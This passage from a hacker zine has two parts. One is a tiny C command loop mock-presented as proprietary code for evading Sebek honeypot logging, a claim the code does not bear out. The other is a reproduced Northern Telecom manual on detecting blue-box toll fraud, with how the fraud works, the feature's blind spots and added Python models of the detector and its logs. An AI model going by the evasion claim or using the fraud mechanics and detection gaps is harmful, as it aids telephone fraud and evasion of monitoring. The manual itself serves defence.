|=[ 0x0c ]=--------------------------------------------------------------=|

Sebek Sucks
by Chris Spencer


/*
 * Copyright (C) 2002, 2003 ISS Inc.
 *     All Rights Reserved.
 *
 * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ISS
 * The copyright notice above does not evidence any
 * actual or intended publication of such source code.
 *
 * This code can be very dangerous if put in the wrong hands.
 * Do not distribute.
 *
 * This piece of warez lets you go unlogged on sebek-enabled honeypots.
 *
 */

#include <stdio.h>
#include <stdlib.h>	/* exit(), system() */
#include <string.h>
#include <unistd.h>	/* chdir() */

int main (int argc, char **argv)
{
	int l;
	char *p, buf[1024];

	/* read one command per line from stdin and hand it to the shell */
	while (fgets (buf, sizeof (buf) - 1, stdin)) {
		l = strcspn (buf, "\r\n");
		buf[l] = '\0';

		if (!strcmp (buf, "exit") || !strcmp (buf, "logout")) {
			exit (0);
		}
		else if (!strncmp (buf, "cd", 2)) {
			/* cd must change this process's cwd, not a child's */
			p = strrchr (buf, ' ');
			if (!p)
				continue;
			chdir (p + 1);
		}
		else {
			system (buf);
		}
	}
	return 0;
}




|=[ 0x0d ]=--------------------------------------------------------------=|

Bluebox Infoz
by tr4shc4n m4n


Yo yo- 
|=----------------------------------------------------------------------=|
How many times have you been hanging around on IRC when some moron goes
off about BlueBoxing, and the threat it poses?
(See #2600/#hackphreak/#cdc/#pla <- theze guys are the worst.) Well, for
this issue we decided to dump something found in the trash a few years
ago by one of our S3kr3t 4g3ntz. Thanks to this document the textfile
knowledge of a generation of overweight wannabe vampire hackers
( yo werd 2 the DoC ) will be eradicated.
Yo propz to liveevil -
where you @ bro!@#!@#!@#!@#!@#.


PS. SOMEONE PLZ GIVE US A FUCKING SCANNER THIS SHIT IS HARD AS FUCK TO
RETYPE!!



Contents
Introduction 1-1
Description 2-1
Testing for fraudulent calls 2-3
Recording fraudulent calls 2-5
Disposing of fraudulent calls 2-5
Cut the call 2-5
Continue the call 2-5
Operational measurements 3-1
User interface 4-1
Commands 4-1
Alarms 4-4
Logs 4-4
List of terms 5-1
List of figures
Figure 2-1 Fraudulent call setup 2-1
Figure 2-2 Fraudulent call system response 2-2
Figure 2-3 Reserved multifrequency receiver 2-3
List of tables
Table 2-1 MFR attachment response 2-4
Table 3-1 Blue box fields 3-1
Table 4-1 Log description 4-5

Blue Box Fraud Detection Feature Description BCS22 and up
1-1
Introduction
This document describes the Blue Box Fraud Detection feature and its
operation within the DMS-100 Family. A "blue box" is any device, connected
illegally to a subscriber's line, that can produce both a 2600 Hz tone and
multifrequency (MF) digits.
To place a fraudulent call, the perpetrator performs two steps:
1 The perpetrator uses a normal telephone to place a normal call. This call
is usually a free or inexpensive call, and uses a Single Frequency (SF)
trunk beyond the perpetrator's billing office.
2 The perpetrator uses a blue box to place the fraudulent call. This call
uses the SF trunk seized for the original, normal call.
The perpetrator's billing office typically does not detect calls placed with a
"blue box", thus the term "blue box fraud".
The Blue Box Fraud Detection feature discovers fraudulent MF signaling
over Centralized Automatic Message Accounting (CAMA) and SuperCAMA
trunks. It does not detect fraudulent signaling over Traffic Operator Position
System (TOPS) trunks. The Blue Box Fraud Detection feature can
alert the operating company of a fraudulent call attempt and either allow
billing to be made for the call or disconnect the call.
This feature detects fraudulent MF signaling but does not detect fraudulent
SF pulsing. No customer data schema is required, because the feature is
activated and deactivated using the Command Interpreter (CI) facilities
at the Maintenance and Administration Position (MAP). The feature
implements the method of detection of fraudulent telephone calls described
in U.S. patent 4,001,513.

Description
The Blue Box Fraud Detection feature allows the DMS-200 to perform
three fraud detection functions:
- test for fraudulent calls
- record fraudulent calls
- dispose of fraudulent calls (cut or continue).
Those events are described in the remainder of this chapter.
Figure 2-1 describes how a perpetrator initiates a fraudulent call.
Figure 2-1
Fraudulent call setup
To place a fraudulent call, the perpetrator first places a normal call. The
End Office sends the digits to the CAMA office. The CAMA office receives and
translates the digits from the End Office, and seizes an outgoing trunk. The
Office at the far end of the outgoing trunk winks in response, and the CAMA
office sends the called digits for this normal call. No fraud has taken place
yet.
[Diagram: END OFFICE -> CAMA TRUNK -> CAMA OFFICE (DMS-200) -> OUTGOING TRUNK
-> far-end office; the far end answers the seizure with a WINK.]
297-1001-132 Standard 02.02 March 1991
Figure 2-2 describes how the system responds to a fraudulent call, and how
the testing procedure is invoked.

Figure 2-2
Fraudulent call system response
[Diagram: the same call path as Figure 2-1 (End Office, CAMA trunk, CAMA
Office/DMS-200, outgoing trunk, wink) with a BLUE BOX added at the
originating end. The callout text of this figure is identical to that of
Figure 2-1 in the source.]
Testing for fraudulent calls
Triggered by the unexpected wink, the DMS-200 begins to test the suspected
fraudulent call. Figure 2-3 describes how the DMS-200 prepares to
test for fraudulent calls.
Figure 2-3
Reserved multifrequency receiver
[Diagram: the Figure 2-2 call path, with a broadcast connection from the
incoming CAMA trunk to a reserved MFR inside the DMS-200. Callout text of
the figure:]
To test the call, the DMS-200 establishes a broadcast network connection
from the suspected incoming CAMA trunk to a reserved MF receiver (MFR).
These MFR are reserved when the feature is activated. As long as the
feature is active, the reserved MFR are not available for standard call
processing.
NOTE: The number of MFR set in reserve depends on the number of
simultaneous fraud attempts expected. For provisioning MFR refer to
Provisioning, 297-1001-450.
Table 2-1 describes the events that occur after the MFR is attached. After
attaching the MFR, the DMS-200 waits for one of the events shown in the
"Event" column of Table 2-1 and responds to that event as shown in the
"System response" column of the same table. Table 2-1 also includes an
"Explanation" column to clarify the circumstances and conditions surrounding
the event being described.
Table 2-1
MFR attachment response

Event         Explanation                          System response
------------  -----------------------------------  ------------------------------------
Wink          Wink on the same trunk again.        Reset the MFR timeout and continue
                                                   to wait.

Digits        A fraudulent set of called digits    Provide the charge utility with
              has been received.                   these digits and use the Automatic
                                                   Message Accounting (AMA) Event
                                                   Information Digit to flag this call
                                                   as a Blue Box call. Release the MFR.
                                                   If the CUT option was specified
                                                   from the MAP, disconnect the call.
                                                   Refer to the Commands section for
                                                   information about the CUT option.

Call Failure  Mutilated digit(s) detected by the   Release the MFR and assume no fraud
              MFR. Several things could cause      has taken place.
              this:
              - the call may have released
              - there may be a real transmission
                problem
              - the perpetrator may be using SF
                pulsing

MFR Timeout   The time allowed to detect possible  Release the MFR and assume no fraud
              fraudulent MF digits has expired.    has taken place.
Recording fraudulent calls
The DMS-200 performs the following actions after detecting a fraudulent
call:
- If the CUT option was not specified, replace the original digits in the
  charge buffer with the fraudulent digits.
  Note: If the perpetrator places more than one fraudulent call, only the
  last call appears in the charge buffer.
- Set the AMA event information digit to mark the call as a blue box call.
  See document Automatic Message Accounting - Northern Telecom Format,
  297-1001-119.
- If the office is performing AMA recording for this call, generate a
  log to alert the operating company office that a Blue Box call is in
  progress.
- If the ALARM option was specified at the MAP, generate a visual/
  audible minor alarm.
Disposing of fraudulent calls
There are two options for disposing of fraudulent calls: Cut the call or
continue the call.
Cut the call
To cut a fraudulent call, the DMS-200 performs the following actions:
- releases the MFR
- releases the connection between the originating and terminating agents
  of the call
- processes the AMA information
- deallocates the terminator
- sets treatment for the originator.
Continue the call
If the CUT option was not specified, the DMS-200 releases the MFR and
the call continues. The perpetrator is billed based on the fraudulent
digits. When the subscriber disconnects the call, the system generates a
log and turns off the alarm if the ALARM option was specified.
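The test, record and dispose steps above (Table 2-1 plus the two sections
that follow it) form one small state machine per suspected trunk. The
following Python is an added illustration of that machine, not Northern
Telecom code: the call and feature records, the event stream (time, kind,
payload), the "no-mfr" outcome when no reserved receiver is free, and the
text of the log strings are constructed for the example; the timeout reset
on a repeat wink, the release of the MFR on every path, the charge-buffer
replacement only when CUT is not set, and the BLUEBOX OM counters follow the
text.

```python
from dataclasses import dataclass, field


@dataclass
class Call:
    """One CAMA call under test (constructed layout, not the switch's own)."""
    trunk: str
    original_digits: str          # called digits sent for the normal call
    charge_digits: str = ""       # digits the charge utility will bill
    blue_box_flag: bool = False   # AMA Event Information Digit set for Blue Box
    connected: bool = True
    alarm_on: bool = False
    logs: list = field(default_factory=list)

    def __post_init__(self):
        self.charge_digits = self.original_digits


@dataclass
class Feature:
    """BLUEBOX activation parameters plus the OM BLUEBOX counters."""
    timeout: int = 30      # seconds the MFR waits for digits (5 to 35)
    alarm: bool = False    # ALARM option
    cut: bool = False      # CUT option
    free_mfr: int = 1      # reserved MFR not currently attached (nmfr 1 to 3)
    bbwinks: int = 0
    bbattach: int = 0
    bbdetect: int = 0


def detect(feature, call, events, attach_time=0):
    """Handle one unexpected wink on an incoming CAMA trunk.

    `events` is a constructed list of (time, kind, payload) seen on the trunk
    after the MFR is attached, kind being "WINK", "DIGITS" or "FAILURE".
    Returns "no-mfr", "no-fraud", "continued" or "cut".
    """
    feature.bbwinks += 1                     # the triggering unexpected wink
    if feature.free_mfr == 0:
        return "no-mfr"                      # assumption: nothing left to attach
    feature.free_mfr -= 1                    # attach a reserved MFR
    feature.bbattach += 1
    deadline = attach_time + feature.timeout
    outcome = "no-fraud"
    for t, kind, payload in events:
        if t > deadline:                     # MFR timeout: assume no fraud
            break
        if kind == "WINK":                   # same trunk winks again
            deadline = t + feature.timeout   # reset the MFR timeout, keep waiting
            continue
        if kind == "FAILURE":                # mutilated digits: assume no fraud
            break
        if kind == "DIGITS":                 # fraudulent called digits received
            feature.bbdetect += 1
            call.blue_box_flag = True        # flag the AMA record
            call.logs.append(f"TRK153 call detected on {call.trunk}: {payload}")
            if feature.alarm:
                call.alarm_on = True         # minor office alarm
                call.logs.append("EXT106 alarm on")
            if feature.cut:
                call.connected = False       # drop originator and terminator
                outcome = "cut"
            else:
                call.charge_digits = payload # bill the fraudulent digits instead
                outcome = "continued"
            break
    feature.free_mfr += 1                    # the MFR is released on every path
    return outcome


def disconnect(call):
    """Subscriber hangs up a continued Blue Box call: log it, clear the alarm."""
    call.connected = False
    if call.alarm_on:
        call.alarm_on = False
        call.logs.append("EXT106 alarm off at disconnect")
    if call.blue_box_flag:
        call.logs.append(f"TRK154 call disconnect on {call.trunk}")
```

Calling detect() a second time on the same Call models a second fraudulent
call on the same seized trunk: the charge buffer keeps only the last set of
digits, as the note under "Recording fraudulent calls" says. Whether repeat
winks also increment BBWinks is not stated, so only the triggering wink is
counted here.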

Operational measurements
The Operational Measurement BLUEBOX is associated with the Blue Box
Fraud Detection feature (see Operational Measurements (OM),
297-1001-814, for more information). The CI command OMSHOW
BLUEBOX will display the contents of each field.
BLUEBOX has the following fields:
Table 3-1
Blue box fields

Field      Description
---------  -----------------------------------------------------------------
BBWinks    Number of unexpected winks detected on incoming CAMA trunks.
           These winks could indicate fraudulent calls.
BBAttach   Number of successful MFR attachments to suspected trunks.
BBDetect   Number of fraudulent calls detected.

User interface
The Blue Box Fraud Detection feature is activated by a CI command issued
at the MAP. The same command can be used to query the status of the feature.
The following section describes the syntax and options of the commands.
Commands
BLUEBOX [ACT [nmfr [timeout [ALARM | CUT]]] | CLR]

activates, clears, or queries the status of the Blue Box Fraud Detection
feature.
Activating the feature reserves the specified number of MFR. Clearing
the feature returns the MFR to the common pool.
Where:
ACT      activates the blue box feature and reserves the specified number
         of MFR.
CLR      deactivates the blue box feature and returns the MFR to the common
         pool.
nmfr     specifies the number of MFR to be reserved.
         Range: 1 through 3.
         Default: 1.
timeout  specifies the number of seconds the MFR will wait for digits.
         Range: 5 through 35.
         Default: 30.
ALARM specifies that an audible/visual alarm will be generated when a
Blue Box call is detected.
CUT specifies that fraudulent calls will be disconnected. If this
parameter is not specified, the fraudulent call will continue.
Note 1: The activation parameters are position-dependent. That is,
nmfr must be specified before timeout; both nmfr and timeout must be
specified before ALARM or CUT.
Note 2: The BLUEBOX command issued without any parameters queries
the system for the feature status.
Examples:
1 Activate the blue box feature using only the default parameters. The
user enters the following CI command:
BLUEBOX ACT
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
1 MFR reserved, timeout set to 30 seconds.
2 Activate the blue box feature and reserve two MFR. The user inputs the
following CI command:
BLUEBOX ACT 2
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
2 MFR reserved, timeout set to 30 seconds.
3 Activate the blue box feature and reserve three MFR with a timeout of
22 seconds. The user inputs the following CI command:
BLUEBOX ACT 3 22
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
3 MFR reserved, timeout set to 22 seconds.
4 Activate the blue box feature with the ALARM option. Reserve one
MFR with a timeout of 30 seconds. The user inputs the following CI
command:
BLUEBOX ACT 1 30 ALARM
The system responds with the feature status and parameters:
Blue Box Feature Status:
Active.
1 MFR reserved, timeout set to 30 seconds.
Detection will report alarm.
5 Activate the blue box feature with the CUT option. Reserve two MFR
with a timeout of 25 seconds. The user inputs the following CI command:
BLUEBOX ACT 2 25 CUT
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
2 MFR reserved, timeout set to 25 seconds.
Detection will cut off call.
6 Determine the status of the blue box feature. The user inputs the
following CI command:
BLUEBOX
If the feature is not active, the system responds with:
Bluebox Fraud Detection Feature Status:
Inactive.
If the feature is active, the system responds with the feature status and
parameters:
Bluebox Fraud Detection Feature Status:
Active.
2 MFR Reserved, timeout set to 35 seconds.
Detection will cut off call.
7 Deactivate the blue box feature and return the MFR to the common pool.
The user inputs the following CI command:
BLUEBOX CLR
The system indicates command execution with the response:
Bluebox Detection Feature Cleared.
Q BLUEBOX
queries the system for the syntax of the BLUEBOX command.
Example:
Display the BLUEBOX command syntax.
The user inputs the following CI command:
Q BLUEBOX
The system responds with the following syntax diagram:
Parameters for Bluebox Fraud Detection
Parms: [<Active Status> {CLR,
ACT [<Number of MFRs> {1 TO 3}]
[<Timeout Value> {5 TO 35}]
[<Notification Option> {ALARM,
CUT}]}]
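The position-dependent syntax above (Note 1, confirmed by the Q BLUEBOX
diagram, which lists one Notification Option of ALARM or CUT) is easy to
get wrong from the MAP: "BLUEBOX ACT ALARM" is not accepted, because nmfr
and timeout must come first. The following Python is an added example of a
parser that enforces those rules and answers with the status text shown in
the examples; it is not DMS-100 software. The BlueboxCI class and the state
it keeps (reserved MFR count, timeout, option) are constructed stand-ins for
the switch's own data.

```python
class BlueboxCI:
    """Constructed model of the BLUEBOX CI command and its status responses."""

    def __init__(self):
        self.active = False
        self.nmfr = 1          # reserved MFR, 1 to 3
        self.timeout = 30      # seconds the MFR waits for digits, 5 to 35
        self.option = None     # "ALARM", "CUT" or None

    def status(self):
        """Text returned by a bare BLUEBOX query and after ACT."""
        if not self.active:
            return "Bluebox Fraud Detection Feature Status:\nInactive."
        lines = ["Bluebox Fraud Detection Feature Status:", "Active.",
                 f"{self.nmfr} MFR reserved, timeout set to {self.timeout} seconds."]
        if self.option == "ALARM":
            lines.append("Detection will report alarm.")
        elif self.option == "CUT":
            lines.append("Detection will cut off call.")
        return "\n".join(lines)

    def execute(self, line):
        """Run one CI line; raises ValueError on syntax the switch would reject."""
        tokens = line.split()
        if not tokens or tokens[0].upper() != "BLUEBOX":
            raise ValueError("not a BLUEBOX command")
        args = tokens[1:]
        if not args:                                   # Note 2: query only
            return self.status()
        verb = args[0].upper()
        if verb == "CLR":
            if len(args) > 1:
                raise ValueError("CLR takes no parameters")
            self.active, self.option = False, None     # MFR back to common pool
            return "Bluebox Detection Feature Cleared."
        if verb != "ACT":
            raise ValueError(f"expected ACT or CLR, got {args[0]!r}")
        nmfr, timeout, option = 1, 30, None            # defaults
        rest = args[1:]
        if rest:                                       # Note 1: nmfr comes first
            nmfr = self._ranged(rest.pop(0), "nmfr", 1, 3)
        if rest:                                       # then timeout
            timeout = self._ranged(rest.pop(0), "timeout", 5, 35)
        if rest:                                       # then ALARM or CUT
            opt = rest.pop(0).upper()
            if opt not in ("ALARM", "CUT"):
                raise ValueError(f"expected ALARM or CUT, got {opt!r}")
            option = opt
        if rest:
            raise ValueError(f"unexpected parameters: {' '.join(rest)}")
        self.active, self.nmfr, self.timeout, self.option = True, nmfr, timeout, option
        return self.status()

    @staticmethod
    def _ranged(token, name, lo, hi):
        """Parse a numeric parameter and check it against its documented range."""
        try:
            value = int(token)
        except ValueError:
            raise ValueError(f"{name} must be a number from {lo} to {hi}, "
                             f"got {token!r}") from None
        if not lo <= value <= hi:
            raise ValueError(f"{name} {value} is outside {lo} to {hi}")
        return value
```

Because the keyword check is reached only after nmfr and timeout have been
consumed, a keyword in the wrong position fails the numeric parse rather
than being silently accepted, which is the behaviour Note 1 describes.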
Alarms
If the ALARM option is specified, a minor office alarm is activated
whenever a blue box call is detected. The office alarm is deactivated
at call disconnect.
Logs
The following six logs are associated with the Blue Box Fraud Detection
feature:
 AUDT118
 EXT106
 TRK151
 TRK152
 TRK153
 TRK154.
The following is a brief description and example of each log. See Log Report
Manual, 297-1001-510, for more detailed information.
Table 4-1
Log description

AUDT118  The Audit subsystem generates this log when Blue Box Fraud
         Detection feature data is inconsistent with the corresponding MFR
         data. The identified MFR cannot be used for fraud detection until
         the problem is cleared.
         Example:
         AUDT118 APR12 12:00:00 2112 FAIL BLUEBOX MFR LOST
         CKT RCVRMF 1

EXT106   The External Alarms subsystem generates this log when a fraudulent
         call is detected and when that call disconnects.
         Example:
         *EXT106 MAR14 12:00:00 2112 INFO BLUEBOX ON
         CALL DETECTED

TRK151   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is activated.
         Example:
         TRK151 APR11 12:00:00 2112 INFO BLUEBOX DETECTION
         ACTIVE
         # OF MFRS = 2 ALARM ENABLED
         CKT RCVRMF 0 CKT RCVRMF 1 CKT RCVRMF 2

TRK152   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is deactivated.
         Example:
         TRK152 APR04 12:00:00 2112 INFO BLUEBOX DETECTION
         CLEARED

TRK153   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is active and a fraudulent call is
         detected.
         Example:
         TRK153 APR16 12:00:00 2112 INFO BLUEBOX CALL DETECTED
         IC TRUNK = CKT RTP2W 1 CALLING # = 9197811199
         OG TRUNK = CKT CARY2W 2 CALLED # = 61247418888
         CALLED # REPLACED BY 3152651234
         CALLID = 123456

TRK154   The Trunk Maintenance subsystem generates this log when the
         Bluebox Fraud Detection feature is active and a fraudulent call is
         disconnected.
         Example:
         TRK154 APR11 12:00:00 2112 INFO BLUEBOX CALL DISCONNECT
         CKT APEX2W 1
         CALLING # = 6133628669 2 CALLED # = 6124741888
         CALLID = 123456
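For anyone collecting these reports off the switch, the useful records are
TRK153 (the detection, with both trunks, the calling number, the original
called number and the digits that replaced it in the charge buffer) and
TRK154 (the disconnect), which share a CALLID. The following Python is an
added example, not part of the practice, of a parser for the six report
formats shown in Table 4-1 and of pairing detections with disconnects by
CALLID. The sample stream is the six examples from the table concatenated
(a constructed input); the header layout (optional alarm asterisk, report
name, date, time, sequence number, severity) is read off those examples, and
the stray "2" after the calling number in the TRK154 example is passed over
because its meaning is not stated.

```python
import re

# Report examples copied from Table 4-1, joined into one constructed stream.
SAMPLE_LOGS = """\
AUDT118 APR12 12:00:00 2112 FAIL BLUEBOX MFR LOST
CKT RCVRMF 1
*EXT106 MAR14 12:00:00 2112 INFO BLUEBOX ON
CALL DETECTED
TRK151 APR11 12:00:00 2112 INFO BLUEBOX DETECTION
ACTIVE
# OF MFRS = 2 ALARM ENABLED
CKT RCVRMF 0 CKT RCVRMF 1 CKT RCVRMF 2
TRK152 APR04 12:00:00 2112 INFO BLUEBOX DETECTION
CLEARED
TRK153 APR16 12:00:00 2112 INFO BLUEBOX CALL DETECTED
IC TRUNK = CKT RTP2W 1 CALLING # = 9197811199
OG TRUNK = CKT CARY2W 2 CALLED # = 61247418888
CALLED # REPLACED BY 3152651234
CALLID = 123456
TRK154 APR11 12:00:00 2112 INFO BLUEBOX CALL DISCONNECT
CKT APEX2W 1
CALLING # = 6133628669 2 CALLED # = 6124741888
CALLID = 123456
"""

# First line of a report: optional "*" (alarm), name, date, time, sequence
# number, severity, free text. Layout inferred from the examples above.
HEADER = re.compile(
    r"^(?P<star>\*?)(?P<name>[A-Z]+\d{3}) (?P<date>[A-Z]{3}\d{2}) "
    r"(?P<time>\d{2}:\d{2}:\d{2}) (?P<seq>\d+) (?P<sev>[A-Z]+) (?P<text>.*)$")
# "LABEL = value" pairs; a value is a circuit ("CKT name member") or digits.
FIELD = re.compile(
    r"(IC TRUNK|OG TRUNK|CALLING #|CALLED #|CALLID|# OF MFRS) = (CKT \S+ \d+|\d+)")
REPLACED = re.compile(r"CALLED # REPLACED BY (\d+)")
MFR = re.compile(r"CKT RCVRMF \d+")


def parse_bluebox_logs(text):
    """Split a log stream into reports and extract the labelled fields."""
    reports = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HEADER.match(line)
        if m:
            rep = m.groupdict()
            rep["alarm"] = rep.pop("star") == "*"   # leading * marks an alarm report
            rep["body"] = [rep.pop("text")]
            reports.append(rep)
        elif reports:
            reports[-1]["body"].append(line)       # continuation line of last report
    for rep in reports:
        body = " ".join(rep["body"])
        rep["body"] = body
        rep["fields"] = dict(FIELD.findall(body))
        r = REPLACED.search(body)
        if r:
            rep["fields"]["CALLED # REPLACED BY"] = r.group(1)
        rep["mfrs"] = MFR.findall(body)            # receivers named in TRK151/AUDT118
    return reports


def correlate_calls(reports):
    """Pair each TRK153 detection with its TRK154 disconnect by CALLID."""
    calls = {}
    for rep in reports:
        f = rep["fields"]
        cid = f.get("CALLID")
        when = f"{rep['date']} {rep['time']}"
        if rep["name"] == "TRK153":
            calls[cid] = {
                "detected": when,
                "ic_trunk": f.get("IC TRUNK"),
                "og_trunk": f.get("OG TRUNK"),
                "calling": f.get("CALLING #"),
                "called_original": f.get("CALLED #"),
                "called_replaced_by": f.get("CALLED # REPLACED BY"),
                "disconnected": None,
            }
        elif rep["name"] == "TRK154" and cid in calls:
            calls[cid]["disconnected"] = when
    return calls
```

An AUDT118 report is worth alerting on in its own right: it means one of
the reserved receivers is out of the fraud-detection pool until the
inconsistency is cleared, so the nmfr actually available is lower than the
TRK151 report claimed.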
List of terms
AMA
Automatic Message Accounting
Automatic Message Accounting
An automatic recording system that documents all the necessary billing data
of subscriber-dialed long distance calls.
Batch Change Supplement
A DMS-100 Family software release.
BCS
Batch Change Supplement
CAMA
Centralized Automatic Message Accounting
A system that produces itemized billing details for subscriber-dialed long
distance calls. Details are recorded at a central facility serving a number
of exchanges. In exchanges not equipped for automatic number identification,
calls are routed to a CAMA operator who obtains the calling number and
keys it into the computer for billing.
CI
Command Interpreter
Command Interpreter
A Support Operating System component that functions as the main interface
between machine and user. Its principal roles are:
1 To read lines entered by a terminal user.
2 To break each line into recognizable units.
3 To analyze the units.
4 To recognize command item-numbers on the input lines.
5 To invoke these commands.
Maintenance and Administration Position
A group of components that provide a man-machine interface between operating
company personnel and the DMS-100 Family systems. A MAP consists
of a Visual Display Unit and keyboard, a voice communications
Module, test facilities, and MAP furniture. MAP is a trademark of Northern
Telecom.
MAP
Maintenance and Administration Position
MF
Multifrequency
MFR
Multifrequency Receiver
Multifrequency
A method that makes use of pairs of standard tones to transmit signaling
codes, digit pulsing, and coin-control signals.
Northern Telecom Practice
A document that contains descriptive information about the DMS-100 Family
hardware and software Modules, and Performance Oriented Practices for
testing and maintaining the system. NTPs are supplied as part of the
standard documentation package provided to an operating company.
NTP
Northern Telecom Practice
PEC
Product Engineering Code
Product Engineering Code
An eight character code that provides a unique identification for each
marketable product manufactured by Northern Telecom.
SF
Single Frequency
Single Frequency
A signaling method using a 2600 Hz tone to transmit and receive on-/offhook
address and supervisory signals. SF is used in conjunction with E and
M signaling on four-wire trunk facilities.
TOPS
Traffic Operator Position System
Traffic Operator Position System
A toll operator's position consisting of a video display and keyboard for
monitoring call details and entering routing and billing information. TOPS
is a trademark of Northern Telecom.




|=[ EOF ]=---------------------------------------------------------------=|